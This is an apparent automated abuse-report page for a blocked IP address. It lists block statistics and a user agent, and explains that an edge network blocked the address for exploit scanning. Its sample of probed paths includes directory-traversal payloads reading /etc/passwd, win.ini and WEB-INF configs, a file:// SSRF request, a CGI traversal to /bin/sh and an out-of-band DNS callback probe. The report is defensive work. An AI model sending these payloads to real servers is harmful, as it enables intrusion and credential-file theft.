abuseip.org
- Reason
- suspicious paths across 1 domains
- Hits (last hour)
- 32
- Unique targets hit
- 1
- Unique paths probed
- 608
- Detection count
- 7
- First seen
- 2026-07-18 09:41:04 UTC
- Last seen
- 2026-07-18 10:59:21 UTC
- Block expires
- 2026-07-19 10:59:42 UTC
Sample paths probed
- /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
- /cgi-bin/broker?csftyp=classic,+ssfile1%3d/etc/passwd&_SERVICE=targetservice&_DEBUG=131&_DEBUG=131&_PROGRAM=sample.webcsf1.sas&sysparm=test&_ENTRY=SAMPLIB.WEBSAMP.PRINT_TO_HTML.SOURCE&BG=%23FFFFFF&DATASET=targetdataset&TEMPFILE=Unknown&style=a+tcolor%3dblue&_WEBOUT=test&bgtype=COLOR
- /resin-doc/;/WEB-INF/resin-web.xml
- /glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd
- /asd/../../../../../../../../etc/passwd
- /index.php
- /getCorsFile?urlPath=file:///etc/passwd
- /action.php
- /file/../../../../../../../../../../../../../../../../../../etc/passwd
- /img/../../../../../../etc/passwd
- /go/add-on/business-continuity/api/plugin?folderName&pluginName=../../../etc/passwd
- /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
- /file/../../../../../../../../../../../../../../../../../../windows/win.ini
- /getCorsFile?urlPath=file:///c://windows/win.ini
- /api/downloads?fileName=../../../../../../../../etc/passwd
- /live_mfg.html
- /registry/machine?app=qjzcw&appType=0&version=0&hostname=nP97S&ip=d9dk22d1afus7tcenacgmy9xi8e9htw5b.dns.wt-oob-server.com&port=0
- /;/WEB-INF/web.xml
- /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh
- /TransferredOutModal.php?modfunc=detail
Sample User-Agents
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
What does this mean?
This address sent traffic that the redirs.com edge classified as automated abuse โ typically WordPress/PHP exploit scanning, credential file probing (.env, .git, .aws/), or mass-domain enumeration. The block is automatic and time-limited (24 hours from last detection).
If you believe this is a false positive, contact [email protected] with the IP and the timestamps above.